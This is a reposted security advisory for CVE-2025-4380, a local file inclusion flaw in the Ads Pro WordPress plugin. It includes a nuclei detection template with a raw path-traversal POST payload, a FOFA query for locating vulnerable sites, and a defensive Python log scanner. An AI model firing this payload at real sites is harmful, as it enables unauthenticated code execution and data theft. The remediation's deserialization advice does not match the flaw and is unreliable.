Ads Pro Plugin Local File Inclusion Vulnerability

Vulnerability Information

Vulnerability name: Ads Pro Plugin Local File Inclusion Vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-4380

Vulnerability type: File inclusion

Severity: Critical

Description: Ads Pro Plugin is a multi-purpose advertising management plugin for WordPress, widely used on WordPress sites that need ad management. All versions up to and including 4.89 contain a local file inclusion vulnerability: an attacker can achieve arbitrary file inclusion through the bsa_template parameter of the bsa_preview_callback function. The root cause is improper handling of user input, which lets an attacker include and execute arbitrary files on the server, including PHP files, potentially bypassing access controls, obtaining sensitive data, or executing arbitrary code. Because the vulnerability can be exploited by unauthenticated attackers and affects a wide install base, it is rated critical. An attacker can use it to execute arbitrary code on affected systems, leading to data leakage, service disruption, or other malicious activity. To defend against it, users are advised to update Ads Pro Plugin to a version later than 4.89, or to disable polymorphic type handling and implement proper input validation and deserialization controls.

Vendor: scripteo

Product: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager

Affected versions: <= 4.89

Search query: body="/wp-content/plugins/ap-plugin-scripteo"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/994186152f2ad6fc9e1c7ebe75e6d4bfcd0a3b66/http%2Fcves%2F2025%2FCVE-2025-4380.yaml

Type: projectdiscovery/nuclei-templates: github issues

POC Details


id: CVE-2025-4380

info:
  name: Ads Pro Plugin <= 4.89 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can be uploaded and included, or already exist on the site.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update the Ads Pro Plugin to version later than 4.89. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://wpscan.com/vulnerability/63964564-73e6-45e2-8145-33e2e30d1d57/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4380
    cwe-id: CWE-98
    cpe: cpe:2.3:a:scripteo:ads_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: scripteo
    product: ads_pro
    fofa-query: body="/wp-content/plugins/ap-plugin-scripteo"
  tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,scripteo,ads-pro

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bsa_preview_callback&bsa_template=../php/example

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Example PHP Ad')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and
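The template above fixes the request shape a defender can key on: a POST to admin-ajax.php with action=bsa_preview_callback and a bsa_template value that is a path rather than a plain template name. The following Python script, an added example that is not code from the Ads Pro Plugin or from the nuclei-templates project, scans a request log for that pattern. It assumes a reverse proxy or WAF writes one JSON object per request with "method", "path" and "body" fields (these field names are an assumption); the log lines embedded in it are constructed, not captured traffic. The same allow-list check on the template name is what a hardened bsa_preview_callback would apply before building a file path.

```python
"""Flag requests matching the CVE-2025-4380 exploitation pattern.

Added example for this advisory; not code from the Ads Pro Plugin or from
projectdiscovery/nuclei-templates. Assumes a JSON-lines request log with
"method", "path" and "body" fields (assumed field names). All sample lines
are constructed.
"""
import json
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample request log (assumed field names, not real traffic).
SAMPLE_LOG = """\
{"method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=bsa_preview_callback&bsa_template=../php/example"}
{"method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=bsa_preview_callback&bsa_template=template-1"}
{"method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=bsa_preview_callback&bsa_template=..%2F..%2Fsome-file"}
{"method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=heartbeat&_nonce=abc"}
{"method": "GET", "path": "/wp-admin/admin-ajax.php?action=bsa_preview_callback&bsa_template=/absolute/path/file", "body": ""}
"""

# A legitimate template name is a bare identifier: no slashes, dots,
# null bytes or stream-wrapper prefixes. This is the allow-list a fixed
# handler would enforce before touching the filesystem.
SAFE_TEMPLATE = re.compile(r"^[A-Za-z0-9_-]+$")


def template_is_suspicious(value: str) -> bool:
    """True when a bsa_template value is anything but a plain template name.

    Decoding twice also catches double-URL-encoded traversal sequences.
    """
    decoded = unquote(unquote(value))
    return not SAFE_TEMPLATE.fullmatch(decoded)


def extract_params(entry: dict) -> dict:
    """Merge query-string and form-body parameters of one request.

    parse_qs already URL-decodes values once.
    """
    params = {}
    parsed = urlparse(entry.get("path", ""))
    params.update(parse_qs(parsed.query, keep_blank_values=True))
    params.update(parse_qs(entry.get("body", ""), keep_blank_values=True))
    return params


def find_lfi_attempts(log_text: str) -> list:
    """Return (line_no, decoded bsa_template) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        entry = json.loads(line)
        path = urlparse(entry.get("path", "")).path
        if not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = extract_params(entry)
        if params.get("action", [""])[0] != "bsa_preview_callback":
            continue
        for value in params.get("bsa_template", []):
            if template_is_suspicious(value):
                hits.append((line_no, unquote(unquote(value))))
    return hits


if __name__ == "__main__":
    for line_no, template in find_lfi_attempts(SAMPLE_LOG):
        print(f"line {line_no}: suspicious bsa_template={template!r}")
```

Running the script reports lines 1, 3 and 5 of the constructed log; line 2 passes the allow-list and line 4 is an unrelated AJAX action. Alerting on this pattern is a stop-gap for visibility only; the fix remains updating the plugin past 4.89 as the advisory states.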



http://example.com/2025/07/09/github_1586193879/
Author: lianccc
Published: July 9, 2025